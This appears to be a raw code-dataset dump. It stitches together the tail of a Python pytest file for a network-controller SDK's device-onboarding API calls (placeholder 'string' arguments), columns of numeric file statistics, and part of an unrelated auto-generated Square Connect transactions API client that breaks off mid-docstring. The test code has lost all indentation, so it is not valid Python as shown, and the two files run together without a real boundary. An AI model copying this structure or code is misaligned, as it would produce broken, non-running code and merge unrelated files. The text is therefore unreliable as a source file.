payload=[{'_id': 'string', 'deviceInfo': {'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 'string', 'stack': True, 'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'}, 'runSummaryList': [{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}], 'systemResetWorkflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'systemWorkflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'tenantId': 'string', 'version': 0, 'workflow': {'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0}, 'workflowParameters': {'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}}]
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_import_devices_in_bulk(api, validator):
assert is_valid_import_devices_in_bulk(
validator,
import_devices_in_bulk(api)
)
def import_devices_in_bulk_default(api):
endpoint_result = api.device_onboarding_pnp.import_devices_in_bulk(
active_validation=True,
payload=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_import_devices_in_bulk_default(api, validator):
try:
assert is_valid_import_devices_in_bulk(
validator,
import_devices_in_bulk_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_update_workflow(json_schema_validate, obj):
json_schema_validate('jsd_3086c9624f498b85_v1_3_1').validate(obj)
return True
def update_workflow(api):
endpoint_result = api.device_onboarding_pnp.update_workflow(
_id='string',
active_validation=True,
addToInventory=True,
addedOn=0,
configId='string',
currTaskIdx=0,
description='string',
endTime=0,
execTime=0,
id='string',
imageId='string',
instanceType='SystemWorkflow',
lastupdateOn=0,
name='string',
payload=None,
startTime=0,
state='string',
tasks=[{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}],
tenantId='string',
type='string',
useState='string',
version=0
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_workflow(api, validator):
assert is_valid_update_workflow(
validator,
update_workflow(api)
)
def update_workflow_default(api):
endpoint_result = api.device_onboarding_pnp.update_workflow(
_id=None,
active_validation=True,
addToInventory=None,
addedOn=None,
configId=None,
currTaskIdx=None,
description=None,
endTime=None,
execTime=None,
id='string',
imageId=None,
instanceType=None,
lastupdateOn=None,
name=None,
payload=None,
startTime=None,
state=None,
tasks=None,
tenantId=None,
type=None,
useState=None,
version=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_workflow_default(api, validator):
try:
assert is_valid_update_workflow(
validator,
update_workflow_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_pnp_global_settings(json_schema_validate, obj):
json_schema_validate('jsd_7e92f9eb46db8320_v1_3_1').validate(obj)
return True
def get_pnp_global_settings(api):
endpoint_result = api.device_onboarding_pnp.get_pnp_global_settings(
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_pnp_global_settings(api, validator):
assert is_valid_get_pnp_global_settings(
validator,
get_pnp_global_settings(api)
)
def get_pnp_global_settings_default(api):
endpoint_result = api.device_onboarding_pnp.get_pnp_global_settings(
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_pnp_global_settings_default(api, validator):
try:
assert is_valid_get_pnp_global_settings(
validator,
get_pnp_global_settings_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_update_pnp_global_settings(json_schema_validate, obj):
json_schema_validate('jsd_8da0391947088a5a_v1_3_1').validate(obj)
return True
def update_pnp_global_settings(api):
endpoint_result = api.device_onboarding_pnp.update_pnp_global_settings(
_id='string',
aaaCredentials={'password': 'string', 'username': 'string'},
acceptEula=True,
active_validation=True,
defaultProfile={'cert': 'string', 'fqdnAddresses': ['string'], 'ipAddresses': ['string'], 'port': 0, 'proxy': True},
payload=None,
savaMappingList=[{'autoSyncPeriod': 0, 'ccoUser': 'string', 'expiry': 0, 'lastSync': 0, 'profile': {'addressFqdn': 'string', 'addressIpV4': 'string', 'cert': 'string', 'makeDefault': True, 'name': 'string', 'port': 0, 'profileId': 'string', 'proxy': True}, 'smartAccountId': 'string', 'syncResult': {'syncList': [{'deviceSnList': ['string'], 'syncType': 'Add'}], 'syncMsg': 'string'}, 'syncResultStr': 'string', 'syncStartTime': 0, 'syncStatus': 'NOT_SYNCED', 'tenantId': 'string', 'token': 'string', 'virtualAccountId': 'string'}],
taskTimeOuts={'configTimeOut': 0, 'generalTimeOut': 0, 'imageDownloadTimeOut': 0},
tenantId='string',
version=0
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_pnp_global_settings(api, validator):
assert is_valid_update_pnp_global_settings(
validator,
update_pnp_global_settings(api)
)
def update_pnp_global_settings_default(api):
endpoint_result = api.device_onboarding_pnp.update_pnp_global_settings(
_id=None,
aaaCredentials=None,
acceptEula=None,
active_validation=True,
defaultProfile=None,
payload=None,
savaMappingList=None,
taskTimeOuts=None,
tenantId=None,
version=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_update_pnp_global_settings_default(api, validator):
try:
assert is_valid_update_pnp_global_settings(
validator,
update_pnp_global_settings_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_delete_workflow_by_id(json_schema_validate, obj):
json_schema_validate('jsd_af8d7b0e470b8ae2_v1_3_1').validate(obj)
return True
def delete_workflow_by_id(api):
endpoint_result = api.device_onboarding_pnp.delete_workflow_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_delete_workflow_by_id(api, validator):
assert is_valid_delete_workflow_by_id(
validator,
delete_workflow_by_id(api)
)
def delete_workflow_by_id_default(api):
endpoint_result = api.device_onboarding_pnp.delete_workflow_by_id(
id='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_delete_workflow_by_id_default(api, validator):
try:
assert is_valid_delete_workflow_by_id(
validator,
delete_workflow_by_id_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_add_device(json_schema_validate, obj):
json_schema_validate('jsd_f3b26b5544cabab9_v1_3_1').validate(obj)
return True
def add_device(api):
endpoint_result = api.device_onboarding_pnp.add_device(
_id='string',
active_validation=True,
deviceInfo={'aaaCredentials': {'password': 'string', 'username': 'string'}, 'addedOn': 0, 'addnMacAddrs': ['string'], 'agentType': 'POSIX', 'authStatus': 'string', 'authenticatedSudiSerialNo': 'string', 'capabilitiesSupported': ['string'], 'cmState': 'NotContacted', 'description': 'string', 'deviceSudiSerialNos': ['string'], 'deviceType': 'string', 'featuresSupported': ['string'], 'fileSystemList': [{'freespace': 0, 'name': 'string', 'readable': True, 'size': 0, 'type': 'string', 'writeable': True}], 'firstContact': 0, 'hostname': 'string', 'httpHeaders': [{'key': 'string', 'value': 'string'}], 'imageFile': 'string', 'imageVersion': 'string', 'ipInterfaces': [{'ipv4Address': {}, 'ipv6AddressList': [{}], 'macAddress': 'string', 'name': 'string', 'status': 'string'}], 'lastContact': 0, 'lastSyncTime': 0, 'lastUpdateOn': 0, 'location': {'address': 'string', 'altitude': 'string', 'latitude': 'string', 'longitude': 'string', 'siteId': 'string'}, 'macAddress': 'string', 'mode': 'string', 'name': 'string', 'neighborLinks': [{'localInterfaceName': 'string', 'localMacAddress': 'string', 'localShortInterfaceName': 'string', 'remoteDeviceName': 'string', 'remoteInterfaceName': 'string', 'remoteMacAddress': 'string', 'remotePlatform': 'string', 'remoteShortInterfaceName': 'string', 'remoteVersion': 'string'}], 'onbState': 'NotContacted', 'pid': 'string', 'pnpProfileList': [{'createdBy': 'string', 'discoveryCreated': True, 'primaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}, 'profileName': 'string', 'secondaryEndpoint': {'certificate': 'string', 'fqdn': 'string', 'ipv4Address': {}, 'ipv6Address': {}, 'port': 0, 'protocol': 'string'}}], 'populateInventory': True, 'preWorkflowCliOuputs': [{'cli': 'string', 'cliOutput': 'string'}], 'projectId': 'string', 'projectName': 'string', 'reloadRequested': True, 'serialNumber': 'string', 'smartAccountId': 'string', 'source': 'string', 'stack': True, 'stackInfo': {'isFullRing': True, 'stackMemberList': [{'hardwareVersion': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'macAddress': 'string', 'pid': 'string', 'priority': 0, 'role': 'string', 'serialNumber': 'string', 'softwareVersion': 'string', 'stackNumber': 0, 'state': 'string', 'sudiSerialNumber': 'string'}], 'stackRingProtocol': 'string', 'supportsStackWorkflows': True, 'totalMemberCount': 0, 'validLicenseLevels': ['string']}, 'state': 'Unclaimed', 'sudiRequired': True, 'tags': {}, 'userSudiSerialNos': ['string'], 'virtualAccountId': 'string', 'workflowId': 'string', 'workflowName': 'string'},
payload=None,
runSummaryList=[{'details': 'string', 'errorFlag': True, 'historyTaskInfo': {'addnDetails': [{'key': 'string', 'value': 'string'}], 'name': 'string', 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}, 'timestamp': 0}],
systemResetWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
systemWorkflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
tenantId='string',
version=0,
workflow={'_id': 'string', 'addToInventory': True, 'addedOn': 0, 'configId': 'string', 'currTaskIdx': 0, 'description': 'string', 'endTime': 0, 'execTime': 0, 'imageId': 'string', 'instanceType': 'SystemWorkflow', 'lastupdateOn': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'tasks': [{'currWorkItemIdx': 0, 'endTime': 0, 'name': 'string', 'startTime': 0, 'state': 'string', 'taskSeqNo': 0, 'timeTaken': 0, 'type': 'string', 'workItemList': [{'command': 'string', 'endTime': 0, 'outputStr': 'string', 'startTime': 0, 'state': 'string', 'timeTaken': 0}]}], 'tenantId': 'string', 'type': 'string', 'useState': 'string', 'version': 0},
workflowParameters={'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_device(api, validator):
assert is_valid_add_device(
validator,
add_device(api)
)
def add_device_default(api):
endpoint_result = api.device_onboarding_pnp.add_device(
_id=None,
active_validation=True,
deviceInfo=None,
payload=None,
runSummaryList=None,
systemResetWorkflow=None,
systemWorkflow=None,
tenantId=None,
version=None,
workflow=None,
workflowParameters=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_add_device_default(api, validator):
try:
assert is_valid_add_device(
validator,
add_device_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_preview_config(json_schema_validate, obj):
return True if obj else False
def preview_config(api):
endpoint_result = api.device_onboarding_pnp.preview_config(
active_validation=True,
deviceId='string',
payload=None,
siteId='string',
type='Default'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_preview_config(api, validator):
assert is_valid_preview_config(
validator,
preview_config(api)
)
def preview_config_default(api):
endpoint_result = api.device_onboarding_pnp.preview_config(
active_validation=True,
deviceId=None,
payload=None,
siteId=None,
type=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_preview_config_default(api, validator):
try:
assert is_valid_preview_config(
validator,
preview_config_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_claim_device(json_schema_validate, obj):
json_schema_validate('jsd_d8a619974a8a8c48_v1_3_1').validate(obj)
return True
def claim_device(api):
endpoint_result = api.device_onboarding_pnp.claim_device(
active_validation=True,
configFileUrl='string',
configId='string',
deviceClaimList=[{'configList': [{'configId': 'string', 'configParameters': [{'key': 'string', 'value': 'string'}]}], 'deviceId': 'string', 'licenseLevel': 'string', 'licenseType': 'string', 'topOfStackSerialNumber': 'string'}],
fileServiceId='string',
imageId='string',
imageUrl='string',
payload=None,
populateInventory=True,
projectId='string',
workflowId='string'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_claim_device(api, validator):
assert is_valid_claim_device(
validator,
claim_device(api)
)
def claim_device_default(api):
endpoint_result = api.device_onboarding_pnp.claim_device(
active_validation=True,
configFileUrl=None,
configId=None,
deviceClaimList=None,
fileServiceId=None,
imageId=None,
imageUrl=None,
payload=None,
populateInventory=None,
projectId=None,
workflowId=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_claim_device_default(api, validator):
try:
assert is_valid_claim_device(
validator,
claim_device_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
def is_valid_get_device_list(json_schema_validate, obj):
json_schema_validate('jsd_e6b3db8046c99654_v1_3_1').validate(obj)
return True
def get_device_list(api):
endpoint_result = api.device_onboarding_pnp.get_device_list(
cm_state='value1,value2',
last_contact=True,
limit=0,
name='value1,value2',
offset=0,
onb_state='value1,value2',
pid='value1,value2',
project_id='value1,value2',
project_name='value1,value2',
serial_number='value1,value2',
smart_account_id='value1,value2',
sort='value1,value2',
sort_order='string',
source='value1,value2',
state='value1,value2',
virtual_account_id='value1,value2',
workflow_id='value1,value2',
workflow_name='value1,value2'
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_list(api, validator):
assert is_valid_get_device_list(
validator,
get_device_list(api)
)
def get_device_list_default(api):
endpoint_result = api.device_onboarding_pnp.get_device_list(
cm_state=None,
last_contact=None,
limit=None,
name=None,
offset=None,
onb_state=None,
pid=None,
project_id=None,
project_name=None,
serial_number=None,
smart_account_id=None,
sort=None,
sort_order=None,
source=None,
state=None,
virtual_account_id=None,
workflow_id=None,
workflow_name=None
)
return endpoint_result
@pytest.mark.device_onboarding_pnp
def test_get_device_list_default(api, validator):
try:
assert is_valid_get_device_list(
validator,
get_device_list_default(api)
)
except Exception as original_e:
with pytest.raises(TypeError, match="but instead we received None"):
raise original_e
| 38.391304
| 5,192
| 0.678033
| 6,292
| 56,512
| 5.807851
| 0.062301
| 0.049476
| 0.058753
| 0.030649
| 0.937006
| 0.928194
| 0.914649
| 0.904633
| 0.862135
| 0.830145
| 0
| 0.014844
| 0.189393
| 56,512
| 1,471
| 5,193
| 38.417403
| 0.782881
| 0.020509
| 0
| 0.683577
| 0
| 0
| 0.241842
| 0.020905
| 0
| 0
| 0
| 0
| 0.048151
| 1
| 0.120378
| false
| 0.003439
| 0.011178
| 0.00172
| 0.203783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e404ecd1d3050faa39cf19bb31f3d06a11f65007
| 30,048
|
py
|
Python
|
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
squareconnect/apis/transactions_api.py
|
xethorn/connect-python-sdk
|
a0543b2f7ea498865c6d916de0b10370f89ebc77
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Copyright 2017 Square, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class TransactionsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def capture_transaction(self, location_id, transaction_id, **kwargs):
"""
CaptureTransaction
Captures a transaction that was created with the [Charge](#endpoint-charge) endpoint with a `delay_capture` value of `true`. See [Delayed capture transactions](/articles/delayed-capture-transactions/) for more information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.capture_transaction(location_id, transaction_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: (required)
:param str transaction_id: (required)
:return: CaptureTransactionResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'transaction_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method capture_transaction" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `capture_transaction`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params) or (params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `capture_transaction`")
resource_path = '/v2/locations/{location_id}/transactions/{transaction_id}/capture'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
if 'transaction_id' in params:
path_params['transaction_id'] = params['transaction_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CaptureTransactionResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def charge(self, location_id, body, **kwargs):
"""
Charge
Charges a card represented by a card nonce or a customer's card on file. Your request to this endpoint must include _either_: - A value for the `card_nonce` parameter (to charge a card nonce generated with the `SqPaymentForm`) - Values for the `customer_card_id` and `customer_id` parameters (to charge a customer's card on file) In order for an eCommerce payment to potentially qualify for [Square chargeback protection](https://squareup.com/help/article/5394), you _must_ provide values for the following parameters in your request: - `buyer_email_address` - At least one of `billing_address` or `shipping_address` When this response is returned, the amount of Square's processing fee might not yet be calculated. To obtain the processing fee, wait about ten seconds and call [RetrieveTransaction](#endpoint-retrievetransaction). See the `processing_fee_money` field of each [Tender included](#type-tender) in the transaction.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.charge(location_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: The ID of the location to associate the created transaction with. (required)
:param ChargeRequest body: An object containing the fields to POST for the request. See the corresponding object definition for field details. (required)
:return: ChargeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method charge" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `charge`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `charge`")
resource_path = '/v2/locations/{location_id}/transactions'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChargeResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def create_refund(self, location_id, transaction_id, body, **kwargs):
"""
CreateRefund
Initiates a refund for a previously charged tender. You must issue a refund within 120 days of the associated payment. See [this article](https://squareup.com/help/us/en/article/5060) for more information on refund behavior.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_refund(location_id, transaction_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: The ID of the original transaction's associated location. (required)
:param str transaction_id: The ID of the original transaction that includes the tender to refund. (required)
:param CreateRefundRequest body: An object containing the fields to POST for the request. See the corresponding object definition for field details. (required)
:return: CreateRefundResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['location_id', 'transaction_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_refund" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'location_id' is set
if ('location_id' not in params) or (params['location_id'] is None):
raise ValueError("Missing the required parameter `location_id` when calling `create_refund`")
# verify the required parameter 'transaction_id' is set
if ('transaction_id' not in params) or (params['transaction_id'] is None):
raise ValueError("Missing the required parameter `transaction_id` when calling `create_refund`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_refund`")
resource_path = '/v2/locations/{location_id}/transactions/{transaction_id}/refund'.replace('{format}', 'json')
path_params = {}
if 'location_id' in params:
path_params['location_id'] = params['location_id']
if 'transaction_id' in params:
path_params['transaction_id'] = params['transaction_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateRefundResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
def list_refunds(self, location_id, **kwargs):
"""
ListRefunds
Lists refunds for one of a business's locations. In addition to full or partial tender refunds processed through Square APIs, refunds may result from itemized returns or exchanges through Square's Point of Sale applications. Refunds with a `status` of `PENDING` are not currently included in this endpoint's response. Max results per [page](#paginatingresults): 50
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_refunds(location_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str location_id: The ID of the location to list refunds for. (required)
:param str begin_time: The beginning of the requested reporting period, in RFC 3339 format. See [Date ranges](#dateranges) for details on date inclusivity/exclusivity. Default value: The current time minus one year.
:param str end_time: The end of the requested reporting period, in RFC 3339 format. See [Date ranges](#dateranges) for details on date inclusivity/exclusivity. Default value: The current time.
